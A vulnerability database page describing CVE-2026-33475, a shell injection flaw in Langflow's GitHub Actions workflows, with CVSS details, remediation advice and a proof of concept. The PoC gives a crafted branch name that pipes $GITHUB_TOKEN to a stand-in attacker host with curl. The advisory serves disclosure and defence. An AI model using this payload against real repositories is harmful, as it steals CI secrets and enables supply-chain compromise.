Skip to main content

Docker EUVDEUVD-2026-14790

| CVE-2026-33475 CRITICAL
Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') (CWE-74)
2026-03-24 GitHub_M
9.1
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
9.1 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

Lifecycle Timeline

7
Analysis Updated
Apr 16, 2026 - 05:49 EUVD-patch-fix
executive_summary
Re-analysis Queued
Apr 16, 2026 - 05:29 backfill_euvd_patch
patch_released
Patch available
Apr 16, 2026 - 05:29 EUVD
1.9.0
PoC Detected
Mar 24, 2026 - 19:13 vuln.today
Public exploit code
EUVD ID Assigned
Mar 24, 2026 - 13:00 euvd
EUVD-2026-14790
Analysis Generated
Mar 24, 2026 - 13:00 vuln.today
CVE Published
Mar 24, 2026 - 12:54 nvd
CRITICAL 9.1

DescriptionGitHub Advisory

Langflow is a tool for building and deploying AI-powered agents and workflows. An unauthenticated remote shell injection vulnerability exists in multiple GitHub Actions workflows in the Langflow repository prior to version 1.9.0. Unsanitized interpolation of GitHub context variables (e.g., ${{ github.head_ref }}) in run: steps allows attackers to inject and execute arbitrary shell commands via a malicious branch name or pull request title. This can lead to secret exfiltration (e.g., GITHUB_TOKEN), infrastructure manipulation, or supply chain compromise during CI/CD execution. Version 1.9.0 patches the vulnerability.

---

Details

Several workflows in .github/workflows/ and .github/actions/ reference GitHub context variables directly in run: shell commands, such as:

yaml
run: |
  validate_branch_name "${{ github.event.pull_request.head.ref }}"

Or:

yaml
run: npx playwright install ${{ inputs.browsers }} --with-deps

Since github.head_ref, github.event.pull_request.title, and custom inputs.* may contain user-controlled values, they must be treated as untrusted input. Direct interpolation without proper quoting or sanitization leads to shell command injection.

---

PoC

  1. Fork the Langflow repository
  2. Create a new branch with the name:
bash
   injection-test && curl https://attacker.site/exfil?token=$GITHUB_TOKEN
  1. Open a Pull Request to the main branch from the new branch
  2. GitHub Actions will run the affected workflow (e.g., deploy-docs-draft.yml)
  3. The run: step containing:
yaml
   echo "Branch: ${{ github.head_ref }}"

Will execute:

bash
   echo "Branch: injection-test"
   curl https://attacker.site/exfil?token=$GITHUB_TOKEN
  1. The attacker receives the CI secret via the exfil URL.

---

Impact

  • Type: Shell Injection / Remote Code Execution in CI
  • Scope: Any public Langflow fork with GitHub Actions enabled
  • Impact: Full access to CI secrets (e.g., GITHUB_TOKEN), possibility to push malicious tags or images, tamper with releases, or leak sensitive infrastructure data

---

Suggested Fix

Refactor affected workflows to use environment variables and wrap them in double quotes:

yaml
env:
  BRANCH_NAME: ${{ github.head_ref }}
run: |
  echo "Branch is: \"$BRANCH_NAME\""

Avoid direct ${{ ... }} interpolation inside run: for any user-controlled value.

---

Affected Files (Langflow 1.3.4)

  • .github/actions/install-playwright/action.yml
  • .github/workflows/deploy-docs-draft.yml
  • .github/workflows/docker-build.yml
  • .github/workflows/release_nightly.yml
  • .github/workflows/python_test.yml
  • .github/workflows/typescript_test.yml

AnalysisAI

An unauthenticated shell injection vulnerability exists in Langflow's GitHub Actions CI/CD workflows, allowing attackers to execute arbitrary commands by crafting malicious branch names or pull request titles. Langflow versions prior to 1.9.0 are affected, specifically the langflow-ai:langflow product. A proof-of-concept exploit exists demonstrating secret exfiltration via crafted branch names, enabling attackers to steal GITHUB_TOKEN credentials and potentially compromise the supply chain without any authentication required.

Technical ContextAI

This vulnerability affects Langflow (cpe:2.3:a:langflow-ai:langflow:*:*:*:*:*:*:*:*), an AI-powered workflow building and deployment tool. The root cause is CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component), specifically manifesting as shell command injection in GitHub Actions workflows. Multiple workflow files including deploy-docs-draft.yml, docker-build.yml, release_nightly.yml, and python_test.yml directly interpolate user-controlled GitHub context variables such as github.head_ref and github.event.pull_request.title into shell run commands without sanitization. The YAML interpolation syntax ${{ ... }} evaluates these variables at workflow runtime, and when user-supplied values contain shell metacharacters or command separators like semicolons or ampersands, they are executed by the shell interpreter (typically bash) in the CI environment with the privileges of the GitHub Actions runner.

RemediationAI

Upgrade Langflow to version 1.9.0 or later, which patches the vulnerability according to the vendor advisory at https://github.com/langflow-ai/langflow/security/advisories/GHSA-87cc-65ph-2j4w. The fix involves refactoring all affected GitHub Actions workflows to use environment variables instead of direct interpolation of GitHub context variables in run commands, specifically wrapping user-controlled values in double quotes and assigning them to intermediate environment variables before use in shell commands. Until patching is possible, organizations maintaining Langflow forks should implement workflow restrictions by disabling GitHub Actions on forks, requiring manual approval for all workflow runs from first-time contributors via repository settings, or implementing branch protection rules that prevent workflow execution from untrusted branches. Additionally, apply the principle of least privilege to GitHub Actions by using fine-grained personal access tokens instead of GITHUB_TOKEN where possible and implementing secret scanning to detect potential token leakage.

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Share

EUVD-2026-14790 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy